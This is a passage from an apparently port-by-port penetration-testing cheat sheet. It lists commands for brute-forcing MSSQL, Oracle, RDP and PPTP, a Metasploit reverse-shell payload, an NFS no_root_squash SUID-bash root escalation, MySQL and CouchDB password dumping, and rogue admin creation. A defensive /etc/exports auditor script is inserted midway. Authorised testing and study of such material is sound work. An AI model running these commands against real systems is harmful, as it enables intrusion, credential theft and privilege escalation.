# wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

  • V3 wordlists - /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt {% endtab %}

{% tab title="Cisco Copy Router Cfg" %}

Copies configuration files from Cisco devices running SNMP.

# copy-router-config.pl [Router IP] [TFTP Server IP] [Community String]

{% endtab %} {% endtabs %}

264/18264 - Checkpoint Firewall

389/636 - LDAP

{% tabs %} {% tab title="Enumeration" %} https://sourceforge.net/projects/ldapminer/

#ldapminer -h [target] -d

{% endtab %}

{% tab title="Anonymous Access" %} LDAP Anonymous Access

ldapsearch -h 192.168.1.101 -p 389 -x -b "dc=mywebsite,dc=com"

{% endtab %}

{% tab title="Tools and Resources" %}
{% endtab %} {% endtabs %}

500/1723 - PPTP/L2TP/VPN

{% tabs %} {% tab title="Enumeration" %}
{% endtab %}

{% tab title="Brute-force" %}
{% endtab %} {% endtabs %}

503 - Modbus

513 - rlogin

#apt install rsh-client
#rlogin -l root 10.11.1.111

514 - rsh/syslog

{% tabs %} {% tab title="Enumeration" %}

rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

{% endtab %}

{% tab title="Brute force" %}
{% endtab %} {% endtabs %}

541 - Fortinet SSLVPN

1025 - NFS/IIS

1433/1434 - MSSQL

{% tabs %} {% tab title="Enum" %}

  • SQLPing - SQL Server scanning tool that also checks for weak passwords using wordlists.
  • SQLpoke - SQL Server scanning tool
    > sqlpoke [Start IP] [End IP] [Port] [Command File]
  • SQL Recon - performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise

{% endtab %}

{% tab title="Brute Force" %}

#sqlbf -u hashes.txt -d dictionary.dic -r out.rep (dictionary attack)
#sqlbf -u hashes.txt -c default.cm -r out.rep (brute-force attack)

{% endtab %}

{% tab title="Metasploit" %} Enumerate MSSQL Servers on the network

msf > use auxiliary/scanner/mssql/mssql_ping
$ nmap -sU --script=ms-sql-info $ip

Bruteforce MsSql

msf > use auxiliary/scanner/mssql/mssql_login

Gain shell using gathered credentials

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Log in to a MsSql server:

root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa

root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME

{% endtab %}

{% tab title="Specialty Tools" %}
{% endtab %}

{% tab title="Resources" %}
{% endtab %} {% endtabs %}

1494 - Citrix

1521 - Oracle

{% tabs %} {% tab title="Enumeration" %} oracsec - A simple utility that can be used to enumerate SIDs and carry out a simple username and password check against all default known usernames and passwords.

Oscanner - an Oracle assessment framework developed in Java.

# apt-get install oscanner
# oscanner -s 192.168.1.200 -P 1521

tnscmd10g

#apt-get install tnscmd10g
#tnscmd10g version -h TARGET

Nmap

# nmap --script=oracle-tns-version -p 1521 $ip

{% endtab %}

{% tab title="Brute Force" %} NMAP

# nmap --script=oracle-sid-brute -p 1521 $ip
# nmap --script=oracle-brute -p 1521 $ip

{% endtab %}

{% tab title="ODAT" %}

This package contains the ODAT (Oracle Database Attacking Tool), an open source penetration testing tool that tests the security of Oracle Databases remotely.

{% endtab %} {% endtabs %}

1723 - PPTP

  • thc-pptp-bruter - Brute force program against PPTP VPN endpoints (TCP port 1723). Fully standalone. Supports the latest MSChapV2 authentication. Tested against Windows and Cisco gateways. Exploits a weakness in Microsoft's anti-brute-force implementation which makes it possible to try 300 passwords per second.

1900 - SSDP (UDP)

  • evil-ssdp - This tool responds to SSDP multicast discover requests, posing as a generic UPnP device on a local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network.

2000 - Cisco SCCP

cisco-auditing-tool

#CAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt 

Cisco Smart Install exploitation tool

sudo python siet.py -g -i 192.168.0.1

2049 - NFS

{% tabs %} {% tab title="Enumeration" %}

#showmount -e hostname/ip
#mount -t nfs [ip]:/directory_found /local_mount_point

{% endtab %}

{% tab title="Mounting" %}

#mkdir /tmp/mount
#sudo mount -t nfs [IP]:[share] /tmp/mount/ -o nolock

{% endtab %}

{% tab title="Root Squashing Attack" %}

Check

  • Root squashing - check whether root on the client keeps uid 0 on the export (no_root_squash), which allows the creation of SUID files

Attack - Bad Root Squash

  • NFS Access ->
  • Gain Low Privilege Shell ->
  • Upload Bash Executable to the NFS share ->
#cp /bin/bash /tmp/mount/
#cd /tmp/mount/
#sudo chown root bash
#sudo chmod 4777 bash
  • Set SUID Permissions Through NFS Due To Misconfigured Root Squash ->
  • Login through SSH ->
  • Execute SUID Bit Bash Executable -> # ./bash -p
  • ROOT ACCESS

{% endtab %} {% endtabs %}
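The misconfiguration behind this attack is visible in /etc/exports on the server. The following is an added example, not from the original page, that parses an exports file following the exports(5) rules and flags no_root_squash, insecure, and any entry that is writable by every host, including the classic stray-space mistake where "10.0.0.5 (rw)" silently exports read-write to the world because the option list is no longer attached to the client. The exports content is constructed.

```python
"""Audit /etc/exports for root-squash and open-export problems (added example)."""
import re

# "<client>(<opt>,<opt>)" or a bare client with no option list
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return [(path, client, [options])] following exports(5) rules.

    A client with no option list gets the defaults (ro, root_squash).
    A space before '(' (e.g. '/srv 10.0.0.5 (rw)') is the classic mistake:
    the options then apply to everyone ('*'), not to 10.0.0.5."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:] or ["*"]   # no client = all hosts
        for spec in clients:
            match = CLIENT_RE.match(spec)
            host = match.group(1) or "*"
            opts = [o.strip() for o in (match.group(2) or "").split(",") if o.strip()]
            entries.append((path, host, opts))
    return entries


def audit_exports(text):
    """Return (path, client, problem) findings for risky export entries."""
    findings = []
    for path, host, opts in parse_exports(text):
        options = set(opts)
        if "no_root_squash" in options:
            findings.append((path, host,
                             "no_root_squash: client root is uid 0 on the share, SUID files can be planted"))
        if "insecure" in options:
            findings.append((path, host,
                             "insecure: requests accepted from unprivileged client ports"))
        if host == "*" and "rw" in options:
            findings.append((path, host,
                             "rw for any host (check for a stray space before the option list)"))
    return findings


# Constructed sample exports file.
SAMPLE_EXPORTS = """\
# constructed sample
/srv/share    10.0.0.0/24(rw,sync,no_root_squash)
/srv/public   *(ro,sync)
/srv/backup   10.0.0.5 (rw,sync)
"""

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

The fix for the first finding is to drop no_root_squash (root_squash is the default, mapping client root to nobody); the third finding is fixed by removing the space so the options bind to the intended client.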

2100 - Oracle XML DB

Default passwords:

https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm

3268/3269 - LDAP Global Catalog

3306 - MySQL

{% tabs %} {% tab title="Connect" %}

#mysql -h [IP] -u [username] -p

{% endtab %}

{% tab title="Administration" %}

#mysqlshow
#mysqlbinlog

Create new user and grant priv

mysql> create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

Access passwords

mysql> use mysql
mysql> select user,password from user;

{% endtab %}

{% tab title="Priv Esc" %}

mysql> select user();
mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';

{% endtab %}

{% tab title="Break Into Shell" %}

mysql> \! cat /etc/passwd
mysql> \! bash

{% endtab %}

{% tab title="Metasploit" %}

admin/mysql/mysql_sql

{% endtab %}

{% tab title="SQLsus" %}

sqlsus is an open source MySQL injection and takeover tool, written in Perl. Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries (even complex ones), download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database(s), and much more. Whenever relevant, sqlsus will mimic a MySQL console output.

{% endtab %} {% endtabs %}

3389 - RDP

{% tabs %} {% tab title="Resources" %}
{% endtab %}

{% tab title="Use" %}

rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10

{% endtab %}

{% tab title="Brute Force" %}

# ncrack -u administrator -P 500-worst-passwords.txt -p 3389 [target]

{% endtab %} {% endtabs %}

4443 - Sophos and Sonicwall

4786 - Cisco Smart Install

#nmap -p 4786 -v 192.168.0.1 --script ./cisco-siet.nse

5060 - SIP

  • SipVicious - SIPVicious OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password.

5432 - PostgreSQL

psql -h 10.10.1.111 -U postgres -W
pg_dump --host=10.10.1.111 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump

5601/9200 - ELK

https://pentestbook.six2dez.com/enumeration/webservices/elk

5800/5900 - VNC

{% tabs %} {% tab title="Use" %}

vncviewer 192.168.1.1

{% endtab %}

{% tab title="NMAP" %}

nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111

{% endtab %} {% endtabs %}

5984 - CouchDB

{% tabs %} {% tab title="Enumeration" %}

curl http://example.com:5984/
curl -X GET http://IP:5984/_all_dbs
curl -X GET http://user:password@IP:5984/_all_dbs

{% endtab %}

{% tab title="Create User" %}

curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:chenny' --data-binary '{ "type": "user", "name": "chenny", "roles": ["_admin"], "roles": [], "password": "password" }'

{% endtab %}

{% tab title="Dump DB and Passwords" %}

curl -X GET 'http://127.0.0.1:5984/passwords/_all_docs?include_docs=true' -u chenny:password
curl -X GET http://user:password@localhost:5984/passwords

{% endtab %} {% endtabs %}

5985/5986 - WinRM

  • If 5985 is open, WinRM is running.
  • If 5986 is closed, WinRM is only configured to accept HTTP connections and transport encryption is not enabled.
PS> Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ }
PS> Enable-PSRemoting -Force
gem install evil-winrm
evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder

6379 - Redis

Enumerate:

$ nmap -p6379 --script redis-info $ip

Client:

$ redis-cli -h $ip
# python redis.py 10.10.10.160 redis

8000 - Splunk

9100 - default printer

9200 - Elastic Search API

11211 - Memcached

Enumerate:

$ nmap -p11211 --script memcached-info $ip

Extract data:

msf > use auxiliary/gather/memcached_extractor

27017-19/27080/28017 - MongoDB

RCE Ports